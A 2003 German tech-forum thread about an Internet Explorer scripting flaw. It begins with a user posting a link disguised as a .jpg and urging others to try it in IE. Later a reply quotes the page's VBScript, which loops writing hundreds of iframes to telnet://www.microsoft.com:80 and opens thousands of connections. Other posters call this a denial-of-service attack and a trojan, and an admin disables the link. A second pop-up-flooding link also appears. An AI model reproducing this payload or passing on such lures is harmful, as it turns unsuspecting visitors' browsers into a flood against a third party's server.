ThaWild 10 Geschrieben 24. November 2003 Melden Geschrieben 24. November 2003 Hier wieder eine Sicherheitslücke vom IE... www.mozilla.linuxfaqs.de/Geil.jpg Achtung! Nicht sehr empfehlenswert mit dem IE aufzumachen. Do it on your own risk!
saracs 10 Geschrieben 24. November 2003 Melden Geschrieben 24. November 2003 hi thawild, was passiert denn wenn man den link mitm ie aufmacht!? habs mitm firebird geöffnet und bekomm nur ne meldung das das bild fehler enthält. wäre nett wenn du ein paar mehr infos dazu geben könntest ;) gruss saracs
ThaWild 10 Geschrieben 24. November 2003 Autor Melden Geschrieben 24. November 2003 ausprobieren ;) es zeigt nur eine IE-Sicherheitslücke auf, nix verheerendes, is ja von ner namhaften seite ;) aber wer den link mitm IE aufmacht überlegt sich dann sicher ober weiterhin seine Bankgeschäfte oder ähnliches mit dem IE durchführt Die Sicherheitslücken vom IE werden ja großteil verniedlicht aber der link veranschaulicht schon! greez stefan PS: Wie gesagt "auf eigene Gefahr ;)"
gismo 10 Geschrieben 24. November 2003 Melden Geschrieben 24. November 2003 Habe es mal ausprobiert erstmal meldet sich mein Virusscanner der ein virus entdeckt hat *VBS/DDos-iframeNet.a und dann öffenen sich n aufen Hyperterminals zu Microsoft.com ist schon krass was man so alles machen kann
ThaWild 10 Geschrieben 24. November 2003 Autor Melden Geschrieben 24. November 2003 is aber kein virus sondern nur ein script...;) <edit> n haufen = 12000 ;) </edit>
Lian 2.659 Geschrieben 24. November 2003 Melden Geschrieben 24. November 2003 Stimmt . . . nett - und so simpel :shock: <script type="text/vbscript"> for a=1 to 800 document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">") next </script> das ganze ein ca. 10 mal hintereinander Mein Scanner hat auch angeschlagen und mir sogar den Zugriff auf die Datei verweigert ;)
Dr.Doom 10 Geschrieben 27. November 2003 Melden Geschrieben 27. November 2003 Natürlich mußte ich es auchsofort mal probieren ! Typisch eigendlich !!!! Wenn ich nicht drauf vorbereitet gewesen wäre hätte ich mich echt erschrocken!!!
thorgood 10 Geschrieben 28. November 2003 Melden Geschrieben 28. November 2003 Im Allgemeinen fand ich dieses Board bisher sehr gut, informativ und seriös. Hier einen Link zu veröffentlichen auf einen offiziell eingestuften Trojaner der ein Denial Of Svc auf microsoft.com vornimmt finde ich komplett am Ziel vorbei. thorgood
Lian 2.659 Geschrieben 28. November 2003 Melden Geschrieben 28. November 2003 Nun ja, selbst bei Heise findet man eine Liste aktueller Exploits: http://www.heise.de/security/dienste/browsercheck/demos/ie/ Zur Abhilfe oben beschriebenen Exploits: Einzige Abhilfe ist derzeit, Active Scripting für die Internet-Zone zu deaktivieren (Heise).
MiLLHouSe 15 Geschrieben 28. November 2003 Melden Geschrieben 28. November 2003 Ist das auf der nachfolgenden Seite dann auch sowas in der Art wie der obige Link?? (Vorsicht, es öffnen sich ewig viele Fensterchen!!!) http://www.deutscherfussball.de.ms BETRETEN AUF EIGENE GEFAHR!!!!
thorgood 10 Geschrieben 28. November 2003 Melden Geschrieben 28. November 2003 Hallo Lian, ja die tun das lokal auf dem PC. Der Link oben lässte bis zu 12000 Connections bei http://www.microsoft.com öffnen und das stellt offiziell einen DOS Angriff dar. Find ich für ein von Microsoft empfohlenem Board geschmacklos. thorgood
boardadmin 0 Geschrieben 28. November 2003 Melden Geschrieben 28. November 2003 Okay, der link ist jetzt nicht mehr anklickbar, mehr wäre Zensur bzw. Totschweigen, Mir wäre der thread mit einem Hinweis zu einem Patch auch lieber, aber den gibt es leider (noch) nicht. Ich denke, hier wäre MS gefragt.
Empfohlene Beiträge
Erstelle ein Benutzerkonto oder melde dich an, um zu kommentieren
Du musst ein Benutzerkonto haben, um einen Kommentar verfassen zu können
Benutzerkonto erstellen
Neues Benutzerkonto für unsere Community erstellen. Es ist einfach!
Neues Benutzerkonto erstellenAnmelden
Du hast bereits ein Benutzerkonto? Melde dich hier an.
Jetzt anmelden